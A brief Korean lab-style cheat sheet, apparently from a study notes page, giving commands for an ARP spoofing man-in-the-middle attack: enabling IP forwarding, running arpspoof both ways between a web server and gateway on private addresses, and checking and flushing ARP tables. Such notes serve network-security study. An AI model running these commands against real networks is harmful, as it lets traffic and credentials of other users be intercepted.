IP 포워딩 활성화
echo 1 > /proc/sys/net/ipv4/ip_forward
Bash
복사
ARP 스푸핑 실행
웹 서버로 게이트웨이를 가장
arpspoof -i eth0 -t 192.168.10.135 192.168.10.134
Bash
복사
게이트웨이로 웹 서버를 가장
arpspoof -i eth0 -t 192.168.10.134 192.168.10.135
Bash
복사
arp 테이블 확인
arp -a
Bash
복사
arp 테이블 초기화
Linux
sudo ip -s -s neigh flush all
Bash
복사
Windows
arp -d *
Bash
복사